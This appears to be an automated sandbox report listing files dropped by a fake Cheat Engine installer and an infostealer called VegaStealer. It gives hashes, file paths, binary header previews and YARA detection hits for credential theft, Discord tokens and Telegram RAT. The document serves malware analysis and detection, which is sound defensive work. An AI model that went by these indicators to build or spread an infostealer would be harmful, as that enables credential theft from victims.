SHA1:	EFC032A6822BC57BCD0C9662A6A062BE45F11ACB
SHA-256:	F5AA950381FBCEA7D730AA794974CA9E3310384A95D6CF4D015FBDBD9797B3E4
SHA-512:	C0A084D5C0B645E6A6479B234FA73C405F56310119DD7C8B061334544C47622FDD5139DB9781B339BB3D3E17AC59FDDB7D7860834ECFE8AAD6D2AE8C869E1CB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......2..}vn..vn..vn..-../xn..-../.n..$../bn..$../on..G2r.tn..$../.n..-../on..-../wn..-../yn...../wn...../~n...../Zn..vn..=o...../{n...../hn....p.wn...../wn..Richvn..................PE..L...V..e.....................h...... .............@..................................1....@.............................................p...............................p...................@.......X...@...............0....... ....................text............................... ..`.rdata..............................@..@.data..............................@....didat...............T..............@....rsrc...p............V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	6227973
Entropy (8bit):	7.999704627939555
Encrypted:	true
SSDEEP:	98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
MD5:	7CC0288A2A8BBE014F9E344F3068C8F1
SHA1:	EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
SHA-256:	200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
SHA-512:	869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
Malicious:	false
Preview:	PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....\|..\.....9.i..]<C.....Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o..I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'.......#..G.......l.:`..D.c.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	6227973
Entropy (8bit):	7.999704627939555
Encrypted:	true
SSDEEP:	98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
MD5:	7CC0288A2A8BBE014F9E344F3068C8F1
SHA1:	EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
SHA-256:	200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
SHA-512:	869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
Malicious:	false
Preview:	PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....\|..\.....9.i..]<C.....Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o..I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'.......#..G.......l.:`..D.c.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	6261520
Entropy (8bit):	7.998950113701314
Encrypted:	true
SSDEEP:	98304:O/KXgWUBu+NlRk9OfK2GTyYX+eyaB135PSuXTm0LuM74eL3o1+ykb5io5dtWx9eJ:O/KXNs6OfxGTyHwnXZB3o1jkb5ioPtE2
MD5:	3C17F28CC001F6652377D3B5DEEC10F0
SHA1:	EEB13CF47836FF0A0D5CC380618F33E7818F9D75
SHA-256:	FA352552306B80F3F897F8F21D8579AE642C97D12298E113AE1ADC03902C69B8
SHA-512:	240B31F29D439C09A56D3BF8D4A3EA14F75C2286E209E7DF3F4FF301BFA3AD8228D7BEBE01ACEA6F2F702A0BA7ECDB5583B97372725C77EF497E749740F644B3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG.sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...\|.......3............@.......................... ........`...@.................................D...........HD...........2_..Y...........................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc...HD.......F..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33432
Entropy (8bit):	5.359517379714029
Encrypted:	false
SSDEEP:	768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
MD5:	F39C2690BCCC422B84D70E55F76640E5
SHA1:	D8D4D4391BCCB01003065593B719E65767AECF03
SHA-256:	3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
SHA-512:	5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@..................X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o......o.......0..3........o....(.......o....,...o.......o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33432
Entropy (8bit):	5.359517379714029
Encrypted:	false
SSDEEP:	768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
MD5:	F39C2690BCCC422B84D70E55F76640E5
SHA1:	D8D4D4391BCCB01003065593B719E65767AECF03
SHA-256:	3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
SHA-512:	5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@..................X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o......o.......0..3........o....(.......o....,...o.......o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2060288
Entropy (8bit):	6.611521905910169
Encrypted:	false
SSDEEP:	49152:a4yxp/wFOn9xRo3HVCEi2ynjsPAXkp4K0x8BFuchaFotKLIk:aJTwo93o3UEi2ynjs4Up4KI8BFucME
MD5:	3037E3D5409FB6A697F12ADDB01BA99B
SHA1:	5D80D1C9811BDF8A6CE8751061E21F4AF532F036
SHA-256:	A860BD74595430802F4E2E7AD8FD1D31D3DA3B0C9FAF17AD4641035181A5CE9E
SHA-512:	80A78A5D18AFC83BA96264638820D9EED3DAE9C7FC596312AC56F7E0BA97976647F27BD86EA586524B16176280BD26DAED64A3D126C3454A191B0ADC2BC4E35D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......c./}'.A.'.A.'.A.l.B/:.A.l.F/&.A.l.E/..A.l.D/..A.l.G/&.A.l.@/..A.'.@.-.A.u.E/5.A.u.B/?.A.u.D/Y.A..H/$.A..A/&.A...&.A.'...&.A..C/&.A.Rich'.A.........................PE..L...i..f...........!.....f...N............................................................@.........................0...........T........A..............................p...............................@............................................text....e.......f.................. ..`.rdata..>L.......N...j..............@..@.data............Z..................@....rsrc....A.......B..................@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\CheatEngine75.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3210656
Entropy (8bit):	6.333393446294699
Encrypted:	false
SSDEEP:	49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
MD5:	E652D75D1D0D3F03B6B730E064E9194C
SHA1:	C4220D57971C63A3F0B9F5B68560AEDFDEC18E64
SHA-256:	8958B8D498068BD0657587A04AAF011E7EABEB215276694366A154DA8B55BDB9
SHA-512:	E5E5807224F0858D472584D06975DBE75677AD0A00727B63D1F8E2108DAE179CB469EBAE127BE6C8D5B9DE192BC741637FE1C8A9A4EF3AE46A3BDE76B534A766
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1.....YA1...@......@....................-.......-..9....................0..+...........................................................-.......-......................text.... ,......",................. ..`.itext...(...@,.....&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................

C:\Users\user\AppData\Local\Temp\tmpDECB.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDEDB.tmp.tmpdb

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDF1B.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDF6A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDFC9.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDFE9.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1BF.tmp.tmpdb

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE21D.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE2BB.tmp.tmpdb

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE404.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE462.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE473.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\v2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	278016
Entropy (8bit):	5.887323139606271
Encrypted:	false
SSDEEP:	6144:qmYKJMVRp9hnmy0UYU9B93YUnLbB62X3Rb36h3YQ:ZJ0Rp9hzL82ghIQ
MD5:	3F62213D184B639A0A62BCB1E65370A8
SHA1:	BBF50B3C683550684CDB345D348E98FBE2FCAFE0
SHA-256:	C692DFC29E70A17CABC19561E8E2662E1FE32FDBA998A09FE1A8DC2B7E045B34
SHA-512:	0CD40D714E6A6EBD60CC0C8B0E339905A5F1198A474A531B1794FB562F27053F118718CC68B9652FEF3411906F9D8AD22D0253AF256FA1922133E9907298E803
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_NitroStealer, Description: Yara detected Nitro Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_VEGAStealer, Description: Yara detected VEGA Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_AdesStealer, Description: Yara detected Ades Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Joe Security Rule: infostealer_win_lighting, Description: Detect the Lighting infostealer based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: Sekoia.io Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\v2.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
